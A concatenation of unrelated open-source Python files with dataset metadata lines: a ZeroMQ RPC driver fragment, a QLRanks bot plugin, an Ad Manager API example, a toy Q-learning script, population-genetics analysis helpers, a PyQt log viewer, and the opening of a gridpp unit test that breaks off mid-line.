self.private_ctx.reply(ctx, proxy, **data['args']) return data.setdefault('version', None) data.setdefault('args', {}) proxy.dispatch(ctx, data['version'], data['method'], **data['args']) class ZmqBaseReactor(ConsumerBase): """ A consumer class implementing a centralized casting broker (PULL-PUSH) for RoundRobin requests. """ def __init__(self, conf): super(ZmqBaseReactor, self).__init__() self.mapping = {} self.proxies = {} self.threads = [] self.sockets = [] self.subscribe = {} self.pool = eventlet.greenpool.GreenPool(conf.rpc_thread_pool_size) def register(self, proxy, in_addr, zmq_type_in, out_addr=None, zmq_type_out=None, in_bind=True, out_bind=True, subscribe=None): LOG.info(_("Registering reactor")) if zmq_type_in not in (zmq.PULL, zmq.SUB): raise RPCException("Bad input socktype") # Items push in. inq = ZmqSocket(in_addr, zmq_type_in, bind=in_bind, subscribe=subscribe) self.proxies[inq] = proxy self.sockets.append(inq) LOG.info(_("In reactor registered")) if not out_addr: return if zmq_type_out not in (zmq.PUSH, zmq.PUB): raise RPCException("Bad output socktype") # Items push out. outq = ZmqSocket(out_addr, zmq_type_out, bind=out_bind) self.mapping[inq] = outq self.mapping[outq] = inq self.sockets.append(outq) LOG.info(_("Out reactor registered")) def consume_in_thread(self): def _consume(sock): LOG.info(_("Consuming socket")) while True: self.consume(sock) for k in self.proxies.keys(): self.threads.append( self.pool.spawn(_consume, k) ) def wait(self): for t in self.threads: t.wait() def close(self): for s in self.sockets: s.close() for t in self.threads: t.kill() class ZmqProxy(ZmqBaseReactor): """ A consumer class implementing a topic-based proxy, forwarding to IPC sockets. """ def __init__(self, conf): super(ZmqProxy, self).__init__(conf) self.topic_proxy = {} def consume(self, sock): ipc_dir = CONF.rpc_zmq_ipc_dir #TODO(ewindisch): use zero-copy (i.e. references, not copying) data = sock.recv() msg_id, topic, style, in_msg = data topic = topic.split('.', 1)[0] LOG.debug(_("CONSUMER GOT %s"), ' '.join(map(pformat, data))) # Handle zmq_replies magic if topic.startswith('fanout~'): sock_type = zmq.PUB elif topic.startswith('zmq_replies'): sock_type = zmq.PUB inside = rpc_common.deserialize_msg(_deserialize(in_msg)) msg_id = inside[-1]['args']['msg_id'] response = inside[-1]['args']['response'] LOG.debug(_("->response->%s"), response) data = [str(msg_id), _serialize(response)] else: sock_type = zmq.PUSH if not topic in self.topic_proxy: def publisher(waiter): LOG.info(_("Creating proxy for topic: %s"), topic) try: out_sock = ZmqSocket("ipc://%s/zmq_topic_%s" % (ipc_dir, topic), sock_type, bind=True) except RPCException: waiter.send_exception(*sys.exc_info()) return self.topic_proxy[topic] = eventlet.queue.LightQueue( CONF.rpc_zmq_topic_backlog) self.sockets.append(out_sock) # It takes some time for a pub socket to open, # before we can have any faith in doing a send() to it. if sock_type == zmq.PUB: eventlet.sleep(.5) waiter.send(True) while(True): data = self.topic_proxy[topic].get() out_sock.send(data) LOG.debug(_("ROUTER RELAY-OUT SUCCEEDED %(data)s") % {'data': data}) wait_sock_creation = eventlet.event.Event() eventlet.spawn(publisher, wait_sock_creation) try: wait_sock_creation.wait() except RPCException: LOG.error(_("Topic socket file creation failed.")) return try: self.topic_proxy[topic].put_nowait(data) LOG.debug(_("ROUTER RELAY-OUT QUEUED %(data)s") % {'data': data}) except eventlet.queue.Full: LOG.error(_("Local per-topic backlog buffer full for topic " "%(topic)s. Dropping message.") % {'topic': topic}) def consume_in_thread(self): """Runs the ZmqProxy service""" ipc_dir = CONF.rpc_zmq_ipc_dir consume_in = "tcp://%s:%s" % \ (CONF.rpc_zmq_bind_address, CONF.rpc_zmq_port) consumption_proxy = InternalContext(None) if not os.path.isdir(ipc_dir): try: utils.execute('mkdir', '-p', ipc_dir, run_as_root=True) utils.execute('chown', "%s:%s" % (os.getuid(), os.getgid()), ipc_dir, run_as_root=True) utils.execute('chmod', '750', ipc_dir, run_as_root=True) except utils.ProcessExecutionError: LOG.error(_("Could not create IPC directory %s") % (ipc_dir, )) raise try: self.register(consumption_proxy, consume_in, zmq.PULL, out_bind=True) except zmq.ZMQError: LOG.error(_("Could not create ZeroMQ receiver daemon. " "Socket may already be in use.")) raise super(ZmqProxy, self).consume_in_thread() class ZmqReactor(ZmqBaseReactor): """ A consumer class implementing a consumer for messages. Can also be used as a 1:1 proxy """ def __init__(self, conf): super(ZmqReactor, self).__init__(conf) def consume(self, sock): #TODO(ewindisch): use zero-copy (i.e. references, not copying) data = sock.recv() LOG.debug(_("CONSUMER RECEIVED DATA: %s"), data) if sock in self.mapping: LOG.debug(_("ROUTER RELAY-OUT %(data)s") % { 'data': data}) self.mapping[sock].send(data) return msg_id, topic, style, in_msg = data ctx, request = rpc_common.deserialize_msg(_deserialize(in_msg)) ctx = RpcContext.unmarshal(ctx) proxy = self.proxies[sock] self.pool.spawn_n(self.process, style, topic, proxy, ctx, request) class Connection(rpc_common.Connection): """Manages connections and threads.""" def __init__(self, conf): self.reactor = ZmqReactor(conf) def create_consumer(self, topic, proxy, fanout=False): # Only consume on the base topic name. topic = topic.split('.', 1)[0] LOG.info(_("Create Consumer for topic (%(topic)s)") % {'topic': topic}) # Subscription scenarios if fanout: subscribe = ('', fanout)[type(fanout) == str] sock_type = zmq.SUB topic = 'fanout~' + topic else: sock_type = zmq.PULL subscribe = None # Receive messages from (local) proxy inaddr = "ipc://%s/zmq_topic_%s" % \ (CONF.rpc_zmq_ipc_dir, topic) LOG.debug(_("Consumer is a zmq.%s"), ['PULL', 'SUB'][sock_type == zmq.SUB]) self.reactor.register(proxy, inaddr, sock_type, subscribe=subscribe, in_bind=False) def close(self): self.reactor.close() def wait(self): self.reactor.wait() def consume_in_thread(self): self.reactor.consume_in_thread() def _cast(addr, context, msg_id, topic, msg, timeout=None, serialize=True, force_envelope=False): timeout_cast = timeout or CONF.rpc_cast_timeout payload = [RpcContext.marshal(context), msg] with Timeout(timeout_cast, exception=rpc_common.Timeout): try: conn = ZmqClient(addr) # assumes cast can't return an exception conn.cast(msg_id, topic, payload, serialize, force_envelope) except zmq.ZMQError: raise RPCException("Cast failed. ZMQ Socket Exception") finally: if 'conn' in vars(): conn.close() def _call(addr, context, msg_id, topic, msg, timeout=None, serialize=True, force_envelope=False): # timeout_response is how long we wait for a response timeout = timeout or CONF.rpc_response_timeout # The msg_id is used to track replies. msg_id = uuid.uuid4().hex # Replies always come into the reply service. reply_topic = "zmq_replies.%s" % CONF.rpc_zmq_host LOG.debug(_("Creating payload")) # Curry the original request into a reply method. mcontext = RpcContext.marshal(context) payload = { 'method': '-reply', 'args': { 'msg_id': msg_id, 'context': mcontext, 'topic': reply_topic, 'msg': [mcontext, msg] } } LOG.debug(_("Creating queue socket for reply waiter")) # Messages arriving async. # TODO(ewindisch): have reply consumer with dynamic subscription mgmt with Timeout(timeout, exception=rpc_common.Timeout): try: msg_waiter = ZmqSocket( "ipc://%s/zmq_topic_zmq_replies" % CONF.rpc_zmq_ipc_dir, zmq.SUB, subscribe=msg_id, bind=False ) LOG.debug(_("Sending cast")) _cast(addr, context, msg_id, topic, payload, serialize=serialize, force_envelope=force_envelope) LOG.debug(_("Cast sent; Waiting reply")) # Blocks until receives reply msg = msg_waiter.recv() LOG.debug(_("Received message: %s"), msg) LOG.debug(_("Unpacking response")) responses = _deserialize(msg[-1]) # ZMQError trumps the Timeout error. except zmq.ZMQError: raise RPCException("ZMQ Socket Error") finally: if 'msg_waiter' in vars(): msg_waiter.close() # It seems we don't need to do all of the following, # but perhaps it would be useful for multicall? # One effect of this is that we're checking all # responses for Exceptions. for resp in responses: if isinstance(resp, types.DictType) and 'exc' in resp: raise rpc_common.deserialize_remote_exception(CONF, resp['exc']) return responses[-1] def _multi_send(method, context, topic, msg, timeout=None, serialize=True, force_envelope=False): """ Wraps the sending of messages, dispatches to the matchmaker and sends message to all relevant hosts. """ conf = CONF LOG.debug(_("%(msg)s") % {'msg': ' '.join(map(pformat, (topic, msg)))}) queues = _get_matchmaker().queues(topic) LOG.debug(_("Sending message(s) to: %s"), queues) # Don't stack if we have no matchmaker results if len(queues) == 0: LOG.warn(_("No matchmaker results. Not casting.")) # While not strictly a timeout, callers know how to handle # this exception and a timeout isn't too big a lie. raise rpc_common.Timeout, "No match from matchmaker." # This supports brokerless fanout (addresses > 1) for queue in queues: (_topic, ip_addr) = queue _addr = "tcp://%s:%s" % (ip_addr, conf.rpc_zmq_port) if method.__name__ == '_cast': eventlet.spawn_n(method, _addr, context, _topic, _topic, msg, timeout, serialize, force_envelope) return return method(_addr, context, _topic, _topic, msg, timeout, serialize, force_envelope) def create_connection(conf, new=True): return Connection(conf) def multicall(conf, *args, **kwargs): """Multiple calls.""" return _multi_send(_call, *args, **kwargs) def call(conf, *args, **kwargs): """Send a message, expect a response.""" data = _multi_send(_call, *args, **kwargs) return data[-1] def cast(conf, *args, **kwargs): """Send a message expecting no reply.""" _multi_send(_cast, *args, **kwargs) def fanout_cast(conf, context, topic, msg, **kwargs): """Send a message to all listening and expect no reply.""" # NOTE(ewindisch): fanout~ is used because it avoid splitting on . # and acts as a non-subtle hint to the matchmaker and ZmqProxy. _multi_send(_cast, context, 'fanout~' + str(topic), msg, **kwargs) def notify(conf, context, topic, msg, **kwargs): """ Send notification event. Notifications are sent to topic-priority. This differs from the AMQP drivers which send to topic.priority. """ # NOTE(ewindisch): dot-priority in rpc notifier does not # work with our assumptions. topic.replace('.', '-') kwargs['serialize'] = kwargs.pop('envelope') kwargs['force_envelope'] = True cast(conf, context, topic, msg, **kwargs) def cleanup(): """Clean up resources in use by implementation.""" global ZMQ_CTX if ZMQ_CTX: ZMQ_CTX.term() ZMQ_CTX = None global matchmaker matchmaker = None def _get_ctxt(): if not zmq: raise ImportError("Failed to import eventlet.green.zmq") global ZMQ_CTX if not ZMQ_CTX: ZMQ_CTX = zmq.Context(CONF.rpc_zmq_contexts) return ZMQ_CTX def _get_matchmaker(): global matchmaker if not matchmaker: # rpc_zmq_matchmaker should be set to a 'module.Class' mm_path = CONF.rpc_zmq_matchmaker.split('.') mm_module = '.'.join(mm_path[:-1]) mm_class = mm_path[-1] # Only initialize a class. if mm_path[-1][0] not in string.ascii_uppercase: LOG.error(_("Matchmaker could not be loaded.\n" "rpc_zmq_matchmaker is not a class.")) raise RPCException(_("Error loading Matchmaker.")) mm_impl = importutils.import_module(mm_module) mm_constructor = getattr(mm_impl, mm_class) matchmaker = mm_constructor() return matchmaker
apache-2.0
-8,324,594,890,385,945,000
31.018821
78
0.568361
false
4.02064
false
false
false
anlutro/botologist
plugins/qlranks.py
1
2116
import logging log = logging.getLogger(__name__) import requests import requests.exceptions import botologist.plugin def _get_qlr_data(nick): url = "http://www.qlranks.com/api.aspx" response = requests.get(url, {"nick": nick}, timeout=4) return response.json()["players"][0] def _get_qlr_elo(nick, modes=None): """ Get someone's QLRanks ELO. nick should be a valid Quake Live nickname. modes should be an iterable (list, tuple) of game-modes to display ELO for (duel, ctf, tdm...) """ if modes is None: modes = ("duel",) try: data = _get_qlr_data(nick) except requests.exceptions.RequestException: log.warning("QLRanks request caused an exception", exc_info=True) return "HTTP error, try again!" # qlranks returns rank 0 indicating a player has no rating - if all modes # have rank 0, it is safe to assume the player does not exist unranked = [mode["rank"] == 0 for mode in data.values() if isinstance(mode, dict)] if all(unranked): return "Player not found or no games played: " + data.get("nick", "unknown") retval = data["nick"] # convert to set to prevent duplicates for mode in set(modes): if mode not in data: return "Unknown mode: " + mode if data[mode]["rank"] == 0: retval += " - {mode}: unranked".format(mode=mode) else: retval += " - {mode}: {elo} (rank {rank:,})".format( mode=mode, elo=data[mode]["elo"], rank=data[mode]["rank"] ) return retval class QlranksPlugin(botologist.plugin.Plugin): """QLRanks plugin.""" @botologist.plugin.command("elo", threaded=True) def get_elo(self, msg): """Get a player's ELO from qlranks.""" if len(msg.args) < 1: return if len(msg.args) > 1: if "," in msg.args[1]: modes = msg.args[1].split(",") else: modes = msg.args[1:] return _get_qlr_elo(msg.args[0], modes) else: return _get_qlr_elo(msg.args[0])
mit
1,812,270,986,986,135,800
28.388889
86
0.58034
false
3.538462
false
false
false
Aloomaio/googleads-python-lib
examples/ad_manager/v201808/reconciliation_report_row_service/get_reconciliation_report_rows_for_reconciliation_report.py
1
2609
#!/usr/bin/env python # # Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Gets a reconciliation report's rows for line items that Ad Manager served. """ # Import appropriate modules from the client library. from googleads import ad_manager # Set the ID of the reconciliation report row. RECONCILIATION_REPORT_ID = 'INSERT_RECONCILIATION_REPORT_ID_HERE' def main(client, reconciliation_report_id): # Initialize appropriate service. reconciliation_report_row_service = client.GetService( 'ReconciliationReportRowService', version='v201808') # Create a statement to select reconciliation report rows. statement = (ad_manager.StatementBuilder(version='v201808') .Where(('reconciliationReportId = :reportId ' 'AND lineItemId != :lineItemId')) .WithBindVariable('lineItemId', 0) .WithBindVariable('reportId', long(reconciliation_report_id))) # Retrieve a small amount of reconciliation report rows at a time, paging # through until all reconciliation report rows have been retrieved. while True: response = ( reconciliation_report_row_service .getReconciliationReportRowsByStatement( statement.ToStatement())) if 'results' in response and len(response['results']): for reconciliation_report_row in response['results']: # Print out some information for each reconciliation report row. print('Reconciliation report row with ID "%d", reconciliation source ' '"%s", and reconciled volume "%d" was found.\n' % (reconciliation_report_row['id'], reconciliation_report_row['reconciliationSource'], reconciliation_report_row['reconciledVolume'])) statement.offset += statement.limit else: break print '\nNumber of results found: %s' % response['totalResultSetSize'] if __name__ == '__main__': # Initialize client object. ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage() main(ad_manager_client, RECONCILIATION_REPORT_ID)
apache-2.0
5,258,400,101,180,364,000
39.765625
78
0.706401
false
4.167732
false
false
false
minimalparts/Tutorials
RLcafe/caffe.py
1
3150
import numpy as np import random environment = { 0: [('buongiorno',[[1,0,1]]),('un caffè',[[7,0,1]])], 1: [('un caffè',[[2,0,0.8],[12,-2,0.2]])], 2: [('per favore',[[3,0,1]]),('EOS',[[5,-2,0.9],[6,-1,0.1]])], 3: [('EOS',[[4,-1,1]])], 7: [('per favore',[[8,0,1]]),('EOS',[[9,-3,1]])], 8: [('EOS',[[10,-2,0.9],[11,-1,0.1]])] } #index to actions i_to_actions = {0: 'buongiorno', 1: 'un caffè', 2: 'per favore', 3: 'EOS'} actions_to_i = {'buongiorno':0, 'un caffè':1, 'per favore':2, 'EOS':3} #Initialising the Q matrix q_matrix = [] for i in range(13): q_matrix.append([0,0,0,0]) exit_states = [4,5,6,9,10,11,12] def get_possible_next_actions(cur_pos): return environment[cur_pos] def get_next_state(action): word = action[0] possible_states = action[1] fate = {} for p in possible_states: s = p[0] r = p[1] l = p[2] fate[s] = [r,l] next_state = np.random.choice(list(fate.keys()),1,[v[1] for k,v in fate.items()]) reward = fate[next_state[0]][0] #print(next_state[0],reward) return next_state[0],reward def game_over(cur_pos): return cur_pos in exit_states discount = 0.9 learning_rate = 0.1 for _ in range(500): print("\nEpisode ", _ ) # get starting place cur_pos = 0 # while goal state is not reached episode_return = 0 while(not game_over(cur_pos)): # get all possible next states from cur_step possible_actions = get_possible_next_actions(cur_pos) # select any one action randomly action = random.choice(possible_actions) word = action[0] action_i = actions_to_i[word] print(word) # find the next state corresponding to the action selected next_state,reward = get_next_state(action) episode_return+=reward # update the q_matrix q_matrix[cur_pos][action_i] = q_matrix[cur_pos][action_i] + learning_rate * (reward + discount * max(q_matrix[next_state]) - q_matrix[cur_pos][action_i]) print(cur_pos,q_matrix[cur_pos],next_state) # go to next state cur_pos = next_state print("Reward:",episode_return,"\n") print(np.array(q_matrix).reshape(13,4)) print("Training done...") print("\n***\nTesting...\n***\n") # get starting place cur_pos = 0 episode_return = 0 while(not game_over(cur_pos)): # get all possible next states from cur_step possible_actions = get_possible_next_actions(cur_pos) #print(possible_actions) # select the *possible* action with highest Q value action = None if np.linalg.norm(q_matrix[cur_pos]) == 0: action = random.choice(possible_actions) else: action = actions_to_i[possible_actions[0][0]] c = 0 action_i = c for a in possible_actions: a_i = actions_to_i[a[0]] if q_matrix[cur_pos][a_i] > q_matrix[cur_pos][action]: action = a_i action_i = c c+=1 action = possible_actions[action_i] print(action[0]) next_state,reward = get_next_state(action) episode_return+=reward cur_pos = next_state print("Return:",episode_return)
mit
-4,122,450,842,618,977,300
30.148515
161
0.586459
false
2.902214
false
false
false
broadinstitute/cms
cms/power/power_func.py
1
8625
## functions for analyzing empirical/simulated CMS output ## last updated 09.14.2017 vitti@broadinstitute.org import matplotlib as mp mp.use('agg') import matplotlib.pyplot as plt import numpy as np import math from scipy.stats import percentileofscore ################### ## DEFINE SCORES ## ################### def write_master_likesfile(writefilename, model, selpop, freq,basedir, miss = "neut",): '''adapted from run_likes_func.py''' writefile = open(writefilename, 'w') for score in ['ihs', 'nsl', 'delihh']: hitlikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_" + str(freq) + "_causal.txt"#_smoothed.txt" misslikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_" + str(freq) + "_" + miss + ".txt"#"_smoothed.txt" #assert(os.path.isfile(hitlikesfilename) and os.path.isfile(misslikesfilename)) writefile.write(hitlikesfilename + "\n" + misslikesfilename + "\n") for score in ['xpehh', 'fst', 'deldaf']: hitlikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_choose_" + str(freq) + "_causal.txt"#_smoothed.txt" misslikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_choose_" + str(freq) + "_" + miss + ".txt"#"_smoothed.txt" #assert(os.path.isfile(hitlikesfilename) and os.path.isfile(misslikesfilename)) writefile.write(hitlikesfilename + "\n" + misslikesfilename + "\n") writefile.close() print("wrote to: " + writefilename) return ############### ## REGION ID ## ############### def get_window(istart, physpos, scores, windowlen = 100000): window_scores = [scores[istart]] startpos = physpos[istart] pos = startpos iscore = istart while pos < (startpos + windowlen): iscore += 1 if iscore >= len(scores): break window_scores.append(scores[iscore]) pos = physpos[iscore] #print(str(pos) + " " + str(startpos)) return window_scores def check_outliers(scorelist, cutoff = 3): numscores = len(scorelist) outliers = [item for item in scorelist if item > cutoff] numoutliers = len(outliers) percentage = (float(numoutliers) / float(numscores)) * 100. return percentage def check_rep_windows(physpos, scores, windowlen = 100000, cutoff = 3, totalchrlen=1000000): ''' previous implementation: !!!! this is going to result in false positives whenever I have a small uptick right near the edge of the replicate ''' #check window defined by each snp as starting point rep_percentages = [] numSnps = len(physpos) numWindows = 0 #get exhaustive windows and stop at chrom edge for isnp in range(numSnps): if physpos[isnp] + windowlen < totalchrlen: numWindows +=1 else: #print(str(physpos[isnp]) + "\t") break for iPos in range(numWindows): window_scores = get_window(iPos, physpos, scores, windowlen) percentage = check_outliers(window_scores, cutoff) rep_percentages.append(percentage) return rep_percentages def merge_windows(chrom_signif, windowlen, maxGap = 100000): print('should implement this using bedtools') starts, ends = [], [] contig = False this_windowlen = 0 starting_pos = 0 if len(chrom_signif) > 0: for i_start in range(len(chrom_signif) - 1): if not contig: starts.append(chrom_signif[i_start]) this_windowlen = windowlen #unmerged, default starting_pos = chrom_signif[i_start] if ((chrom_signif[i_start] + this_windowlen) > chrom_signif[i_start + 1]): #contiguous contig = True this_windowlen = chrom_signif[i_start +1] + windowlen - starting_pos #or, could also be contiguous in the situation where the next snp is not within this window because there doesn't exist such a snp elif chrom_signif[i_start +1] >=(chrom_signif[i_start] + this_windowlen) and chrom_signif[i_start +1] < (chrom_signif[i_start] + maxGap): contig = True this_windowlen = chrom_signif[i_start +1] + windowlen - starting_pos else: contig = False if not contig: windowend = chrom_signif[i_start] + windowlen ends.append(windowend) if contig: #last region is overlapped by its predecssor ends.append(chrom_signif[-1] + windowlen) else: starts.append(chrom_signif[-1]) ends.append(chrom_signif[-1] + windowlen) assert len(starts) == len(ends) return starts, ends ########################## ## POWER & SIGNIFICANCE ## ########################## def calc_pr(all_percentages, threshhold): numNeutReps_exceedThresh = 0 totalnumNeutReps = len(all_percentages) for irep in range(totalnumNeutReps): if len(all_percentages[irep]) != 0: if max(all_percentages[irep]) > threshhold: numNeutReps_exceedThresh +=1 numNeutReps_exceedThresh, totalnumNeutReps = float(numNeutReps_exceedThresh), float(totalnumNeutReps) if totalnumNeutReps != 0: pr = numNeutReps_exceedThresh / totalnumNeutReps else: pr = 0 print('ERROR; empty set') return pr def get_causal_rank(values, causal_val): if np.isnan(causal_val): return(float('nan')) assert(causal_val in values) cleanvals = [] for item in values: if not np.isnan(item) and not np.isinf(item): cleanvals.append(item) values = cleanvals values.sort() values.reverse() causal_rank = values.index(causal_val) return causal_rank def get_cdf_from_causal_ranks(causal_ranks): numbins = max(causal_ranks) #? heuristic counts, bins = np.histogram(causal_ranks, bins=numbins, normed = True) #doublecheck cdf = np.cumsum(counts) return bins, cdf def get_pval(all_simscores, thisScore): r = np.searchsorted(all_simscores,thisScore) n = len(all_simscores) pval = 1. - ((r + 1.) / (n + 1.)) if pval > 0: #pval *= nSnps #Bonferroni return pval else: #print("r: " +str(r) + " , n: " + str(n)) pval = 1. - (r/(n+1)) #pval *= nSnps #Bonferroni return pval ############### ## VISUALIZE ## ############### def quick_plot(ax, pos, val, ylabel,causal_index=-1): ax.scatter(pos, val, s=.8) if causal_index != -1: ax.scatter(pos[causal_index], val[causal_index], color='r', s=4) for tick in ax.yaxis.get_major_ticks(): tick.label.set_fontsize('6') ax.set_ylabel(ylabel, fontsize='6') #ax.set_xlim([0, 1500000]) #make flexible? ax.yaxis.set_label_position('right') #ax.set_ylim([min(val), max(val)]) return ax def plot_dist(allvals, savefilename= "/web/personal/vitti/test.png", numBins=1000): #print(allvals) #get rid of nans and infs #cleanvals = [item for item in allvals if not np.isnan(item)] #allvals = cleanvals allvals = np.array(allvals) allvals = allvals[~np.isnan(allvals)] allvals = allvals[~np.isinf(allvals)] #allvals = list(allvals) #print(allvals) print("percentile for score = 10: " + str(percentileofscore(allvals, 10))) print("percentile for score = 15: " + str(percentileofscore(allvals, 15))) if len(allvals) > 0: f, ax = plt.subplots(1) ax.hist(allvals, bins=numBins) plt.savefig(savefilename) print('plotted to ' + savefilename) return def plotManhattan(ax, neut_rep_scores, emp_scores, chrom_pos, nSnps, maxSkipVal = 0, zscores = True): #neut_rep_scores.sort() #print('sorted neutral scores...') lastpos = 0 for chrom in range(1,23): ichrom = chrom-1 if ichrom%2 == 0: plotcolor = "darkblue" else: plotcolor = "lightblue" if zscores == True: #http://stackoverflow.com/questions/3496656/convert-z-score-z-value-standard-score-to-p-value-for-normal-distribution-in?rq=1 #Z SCORE cf SG email 103116 #pvals = [get_pval(neut_rep_scores, item) for item in emp_scores[ichrom]] pvalues = [] for item in emp_scores[ichrom]: if item < maxSkipVal: #speed up this process by ignoring anything obviously insignificant pval = 1 else: #print('scipy') #sys.exit() pval = scipy.stats.norm.sf(abs(item)) pvalues.append(pval) #else: # pval = get_pval(neut_rep_scores, item) #pvalues.append(pval) print("calculated pvalues for chrom " + str(chrom)) chrom_pos = range(lastpos, lastpos + len(pvalues)) logtenpvals = [(-1. * math.log10(pval)) for pval in pvalues] ax.scatter(chrom_pos, logtenpvals, color =plotcolor, s=.5) lastpos = chrom_pos[-1] else: chrom_pos = range(lastpos, lastpos + len(emp_scores[ichrom])) ax.scatter(chrom_pos, emp_scores[ichrom], color=plotcolor, s=.5) lastpos = chrom_pos[-1] return ax def plotManhattan_extended(ax, emp_scores, chrom_pos, chrom): ''' makes a figure more like in Karlsson 2013 instead of Grossman 2013''' ax.plot(chrom_pos, emp_scores, linestyle='None', marker=".", markersize=.3, color="black") ax.set_ylabel('chr' + str(chrom), fontsize=6, rotation='horizontal') labels = ax.get_yticklabels() ax.set_yticklabels(labels, fontsize=6) ax.set_axis_bgcolor('LightGray') return ax
bsd-2-clause
7,845,082,051,252,510,000
34.9375
143
0.679072
false
2.7976
false
false
false
geosohh/AnimeTorr
animetorr/manager/log.py
1
7132
# -*- coding: utf-8 -*- """ Log window. """ __author__ = 'Sohhla' import os from PyQt4 import QtGui, QtCore from qt.log import Ui_Dialog as Ui_Log from shared import constant # TODO: Works, but waaaaaay too slow to load class LogUpdater(QtCore.QObject): """ Updates the [Log window]. """ finish = QtCore.pyqtSignal() update_ui = QtCore.pyqtSignal(str) def __init__(self, parent=None): super(LogUpdater, self).__init__(parent) self.log_paused = False self.previous_log_file_size = 0 self.timer = None self.log_lines_read = -1 self.html_log = "" def start_timer(self): """ Starts timer. When it times out, will update the window again. """ self.timer = QtCore.QTimer() # noinspection PyUnresolvedReferences self.timer.timeout.connect(self.update_log) # PyCharm doesn't recognize timeout.connect()... self.timer.setSingleShot(True) self.timer.start(1000) def update_log(self): """ Reads the log file and updates the window. """ if not self.log_paused: try: log_size = os.path.getsize(constant.LOG_PATH) except os.error: log_size = -1 if self.previous_log_file_size!=log_size and log_size!=-1: if self.previous_log_file_size > log_size: self.log_lines_read = -1 if self.log_lines_read == -1: self.html_log = "<table style=\"font-family:'MS Shell Dlg 2',monospace; font-size:14\">" # reading log, converting into html line_i = 0 for log_line in open(constant.LOG_PATH,'r'): if line_i >= self.log_lines_read: temp = log_line.split(" ## ") asctime = temp[0].strip() name = temp[1].strip() levelname = temp[2].strip() message = temp[3].strip() color = "0000FF" if levelname=="DEBUG": color = "008000" elif levelname=="INFO": color = "000000" elif levelname=="WARNING": color = "B8860B" elif levelname=="ERROR": color = "FF0000" elif levelname=="CRITICAL": color = "8A2BE2" temp = "<tr style=\"color:#"+color+";\">\ <td style=\"padding-right: 5px;\">"+asctime+"</td>\ <td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\ <td style=\"padding-right: 5px; padding-left: 5px; \" align=\"center\">"+name+"</td>\ <td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\ <td style=\"padding-right: 5px; padding-left: 5px; \" align=\"center\">"+levelname+"</td>\ <td style=\"padding-right: 10px;padding-left: 10px;\" align=\"center\">#</td>\ <td style=\"padding-left: 5px;\">"+message+"</td></tr>" self.html_log += temp line_i+=1 self.log_lines_read = line_i if self.log_paused: self.finish.emit() # log paused, exiting thread else: # sending update to GUI self.update_ui.emit(self.html_log+"</table>") self.previous_log_file_size = log_size self.start_timer() else: self.finish.emit() def stop_thread(self): """ Stops log update. """ if self.timer is not None: self.timer.stop() self.finish.emit() class WindowLog(): """ Creates Log window. """ def __init__(self, parent_window): self.dialog_log = WindowLogDialog(self, parent_window, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowMaximizeButtonHint | QtCore.Qt.WindowTitleHint | QtCore.Qt.Window) self.ui_log = Ui_Log() self.ui_log.setupUi(self.dialog_log) self.ui_log.button_pause.clicked.connect(self.pause_log) self.ui_log.text_log.setHtml("Loading...") self.log_paused = False self.thread = None self.log_updater = None self.create_thread() def show(self): """ Shows Log window. """ self.dialog_log.exec_() def create_thread(self): """ Creates thread to update log. """ self.thread = QtCore.QThread(self.dialog_log) self.log_updater = LogUpdater() self.log_updater.moveToThread(self.thread) self.log_updater.update_ui.connect(self.update_log_ui) self.log_updater.finish.connect(self.thread.quit) # noinspection PyUnresolvedReferences self.thread.started.connect(self.log_updater.update_log) # PyCharm doesn't recognize started.connect()... self.thread.start() self.dialog_log.stop_thread.connect(self.log_updater.stop_thread) def update_log_ui(self,new_html): """ Update window with new html. :type new_html: str :param new_html: ... """ self.ui_log.text_log.setHtml(new_html) temp_cursor = self.ui_log.text_log.textCursor() temp_cursor.movePosition(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor) self.ui_log.text_log.setTextCursor(temp_cursor) self.dialog_log.repaint() # noinspection PyArgumentList QtCore.QCoreApplication.processEvents(QtCore.QEventLoop.AllEvents) def pause_log(self): """ Stops window from being updated until the user clicks the button again. """ if self.log_paused: self.log_paused = False self.ui_log.button_pause.setText("Pause Log") self.create_thread() else: self.log_paused = True self.ui_log.button_pause.setText("Resume Log") self.dialog_log.stop_thread.emit() class WindowLogDialog(QtGui.QDialog): """ Overrides default QDialog class to be able to control the close window event. """ stop_thread = QtCore.pyqtSignal() def __init__(self, window, parent=None, params=None): super(WindowLogDialog, self).__init__(parent,params) self.window = window def closeEvent(self, _): """ When closing the window, stop the thread. :type _: QCloseEvent :param _: Describes the close event. Not used. """ if self.window.log_updater is not None: self.stop_thread.emit()
gpl-2.0
-3,731,463,448,882,287,600
35.768041
122
0.514582
false
4.129705
false
false
false
metno/gridpp
tests/neighbourhood_quantile_fast_test.py
1
5647
from __future__ import print_function import unittest import gridpp import numpy as np lats = [60, 60, 60, 60, 60, 70] lons = [10,10.1,10.2,10.3,10.4, 10] """Simple check 20 21 22 23 24 15 16 17 18 19 10 11 12 13 nan 5 6 7 nan 9 0 1 2 3 4 """ values = np.reshape(range(25), [5, 5]).astype(float) values[1, 3] = np.nan values[2, 4] = np.nan values = np.array(values) class Test(unittest.TestCase): def test_invalid_arguments(self): """Check that exception is thrown for invalid arguments""" field = np.ones([5, 5]) halfwidth = -1 quantiles = [-0.1, 1.1, np.nan] thresholds = [0, 1] for quantile in quantiles: with self.assertRaises(ValueError) as e: gridpp.neighbourhood_quantile_fast(field, quantile, halfwidth, thresholds) def test_nan_quantile(self): field = np.ones([5, 5]) halfwidth = 1 quantile = np.nan thresholds = [0, 1] output = gridpp.neighbourhood_quantile_fast(field, quantile, halfwidth, thresholds) np.testing.assert_array_almost_equal(np.nan*np.ones(output.shape), output) def test_empty(self): for quantile in np.arange(0.1,0.9,0.1): for num_thresholds in [1, 2]: thresholds = 